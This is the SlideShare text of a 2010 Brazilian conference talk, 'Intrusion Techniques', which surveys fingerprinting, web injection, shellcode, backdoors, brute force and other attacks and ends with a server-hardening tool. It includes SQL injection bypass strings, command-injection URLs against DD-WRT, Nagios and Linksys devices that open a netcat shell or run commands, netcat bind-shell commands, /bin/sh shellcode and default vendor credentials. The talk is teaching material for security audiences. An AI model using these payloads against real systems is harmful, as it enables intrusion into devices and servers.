Intrusion Techniques
   DcLabs Hacking Tour 2010




                          Ewerson Guimarães (Crash)
                 ...
Agenda



FingerPrint
Web-Bugs
Backdoors                   MetaSploit
Brute Force                 IIS SemiColon
She...
FingerPrint


Grab informations about a target host.
Ex: It's used to identify Operational System and/or Services(daemon)
...
Passive - FingerPrint



• TTL - What the operating system sets the Time To Live on the outbound packet

• Window Size - W...
FingerPrint

Matrix:
FingerPrint

U. Bourne
Web Vulnerability


These vulnerabilities are initially explored through malicious browser
requests compromising the targe...
Web Vulnerability

 SQL-Injection

  It occurs when the attacker can insert a series of SQL statements within a 'query'
 ...
SQL-Injection
Web Vulnerability

CGI Command Injection

It occurs when the attacker insert a series of commands exploiting vulnerable C...
ShellCode Introduction



#include <stdio.h>
main(){
    char *comando[2];
    comando[0]="/bin/sh";
    comando[1]=NULL;
...
Exploits

Kinds of Exploits:

Local: Usually, the objective of a local exploit is to elevate user's
privileges on the mach...
Backdoors/RootKits



Used to maintain access to the system

We can Netcat use for this purpose

nc –vv –l –p 5555
nc –vv ...
Default/Weak passwords
Default passwords are set by its manufacturers/developers and were not
changed after the installat...
Brute Force


It consists in using random combinations of characters/numbers and
symbols, wordlists and/or string generato...
Brute Force


DirBuster - DirBuster is a multi threaded java application designed to brute force directories
and files nam...
Scanners/Fuzzers


  There are 2 types of scanners: Specific which are written for a specific
  vulnerability (BSQLHacker...
Scanners/Fuzzers

Nexpose Community
Scanners/Fuzzers


W3af
Scanners/Fuzzers


Saint
Sniffers


Sniffer monitors and analyzes network traffic. Some of these packets
may contain critical information (such as...
DoS


Denial of Service, consist of attempts to prevent valid users from using a
particular feature or simply drop it


...
MetaSploit
MetaSploit
IIS SemiColon




Secure it? Wtf?
Man-in-the-Middle
Hardening your server

HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system
for vulnerabilities ...
UAI?
crash@dclabs.com.br    irc.freenode.net
                       #dclabs
gr1nch@dclabs.com.br   #securityguys
Upcoming SlideShare
Loading in …5
×

Intrusion Techniques

3,819 views

Published on

Serão demonstradas diversas técnicas de ataque, tais como: Injeções de codigos,brute force, backdoors, root kits, exploits e várias outras maneiras para acessar e se manter indevidamente a servidores,em contra-partida são discutidas melhores praticas para se
evitar os tipos de ataques citados. (Palestra realizada no 3º Festival de Software livre em belo horizonte - FSLBH)

0 Comments
4 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,819
On SlideShare
0
From Embeds
0
Number of Embeds
104
Actions
Shares
0
Downloads
117
Comments
0
Likes
4
Embeds 0
No embeds

No notes for slide

Intrusion Techniques

  1. 1. Intrusion Techniques DcLabs Hacking Tour 2010 Ewerson Guimarães (Crash) Rener Silva (Gr1nch)
  2. 2. Agenda FingerPrint Web-Bugs Backdoors MetaSploit Brute Force IIS SemiColon ShellCode Man-in-the-Middle Exploits Sniffers Scanners/Fuzzers
  3. 3. FingerPrint Grab informations about a target host. Ex: It's used to identify Operational System and/or Services(daemon) version number by TCP/IP response's unique characteristics. The best tool for discovery operating systems, services, devices and others: NMAP (Network Mapper) Basic commands: nmap host (Basic) nmap –sV host (Service Versions) nmap –P0 host ( ICMP ECHO-REPLY Ignore) nmap –O host (Try to grab O.S version) nmap –f host (Firewall/IDS/IPS Evasion)
  4. 4. Passive - FingerPrint • TTL - What the operating system sets the Time To Live on the outbound packet • Window Size - What the operating system sets the Window Size at. • DF - Does the operating system set the Don't Fragment bit. • TOS - Does the operating system set the Type of Service, and if so, at what.
  5. 5. FingerPrint Matrix:
  6. 6. FingerPrint U. Bourne
  7. 7. Web Vulnerability These vulnerabilities are initially explored through malicious browser requests compromising the target in a matter of minutes SQL-Injection Cross Site (XSS) Cross Site Request Forgery (CSRF) CGI’s Command Injection PHP-Injection
  8. 8. Web Vulnerability SQL-Injection It occurs when the attacker can insert a series of SQL statements within a 'query' by manipulating the data entry application. SELECT campos FROM tabela WHERE campo = 'test@test.com'; Inject string: some' OR 'x'='x SELECT fields FROM table WHERE field = ‘some' OR 'x'='x'; admin'-- " or 0=0 # ' or 1=1-- hi' or 'a'='a ' or 0=0 -- or 0=0 # " or 1=1-- hi') or ('a'='a " or 0=0 -- ' or 'x'='x or 1=1-- hi") or ("a"="a
  9. 9. SQL-Injection
  10. 10. Web Vulnerability CGI Command Injection It occurs when the attacker insert a series of commands exploiting vulnerable CGI scripts Nagios: https://www.xxx.com/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+ %24PATH DD-WRT http://www.xxx.com/cgi-bin/;nc$IFS-l$IFS-p$IFS5555$IFS-e$IFS/bin/sh Linksys –Wireless /setup.cgi? ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60& ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=p ing_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1 .1.1;/bin/ps aux&message= HTTP/1.1
  11. 11. ShellCode Introduction #include <stdio.h> main(){ char *comando[2]; comando[0]="/bin/sh"; comando[1]=NULL; execve(comando[0],comando,NULL); :} char shellcode[] = "xebx1fx5ex89x76x0ax31xc0x88x46x09x89x46x0exb0x0bx89" "xf3x8dx4ex0ax8dx56x0excdx80x31xdbx89xd8x40xcdx80xe8" "xdcxffxffxff/bin/sh";
  12. 12. Exploits Kinds of Exploits: Local: Usually, the objective of a local exploit is to elevate user's privileges on the machine as close as possible to root (uid=0) or administrator. They are written to exploit kernel bugs or suid binaries Remote: It works over a network connection and exploit the vulnerable target without any prior access to it. www.securityfocus.com www.milw0rm.com www.secunia.com www.exploit-db.com 0Days –It works usually an unpublished exploit from a brand new found vulnerability. You can buy! $$$$$
  13. 13. Backdoors/RootKits Used to maintain access to the system We can Netcat use for this purpose nc –vv –l –p 5555 nc –vv –l –p 5555 –e /bin/bash nc <ip> <port> RootKits The main purpose of a rootkit is to hide the attacker's presence replacing vital system binaries from target's system Example: Hide files (with match strings) Run command when match strings Hide processes Hide open ports, and others.
  14. 14. Default/Weak passwords Default passwords are set by its manufacturers/developers and were not changed after the installation/configuration. As supplied by the system vendor and meant to be changed at installation time (Nobody do this shit) Ex: Sw 3Com: User: security Pass: security FireBird: User: sysdba Pass: masterkey Weak: Passwords that are easily guessed or in a keyboard sequential Ex: 123456 love House´s phone Birthday Etc...
  15. 15. Brute Force It consists in using random combinations of characters/numbers and symbols, wordlists and/or string generators to crack a password Ex: John the Ripper Hydra SSH Brute Force
  16. 16. Brute Force DirBuster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers
  17. 17. Scanners/Fuzzers There are 2 types of scanners: Specific which are written for a specific vulnerability (BSQLHacker, SQLMAP) and Generic which are written for various kinds of vulnerabilities. Generic scanners use known service banners/strings to locate the potential target/vulnerabilities Saint W3af Nexpose Community
  18. 18. Scanners/Fuzzers Nexpose Community
  19. 19. Scanners/Fuzzers W3af
  20. 20. Scanners/Fuzzers Saint
  21. 21. Sniffers Sniffer monitors and analyzes network traffic. Some of these packets may contain critical information (such as logins, passwords and cool infos ) WhireShark -
  22. 22. DoS Denial of Service, consist of attempts to prevent valid users from using a particular feature or simply drop it SYN FLOOD UDP Packet Storm DDoS Smurf Attack
  23. 23. MetaSploit
  24. 24. MetaSploit
  25. 25. IIS SemiColon Secure it? Wtf?
  26. 26. Man-in-the-Middle
  27. 27. Hardening your server HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files allowing you to get a quick overview of the security status of your system. http://hntool.net
  28. 28. UAI? crash@dclabs.com.br irc.freenode.net #dclabs gr1nch@dclabs.com.br #securityguys

×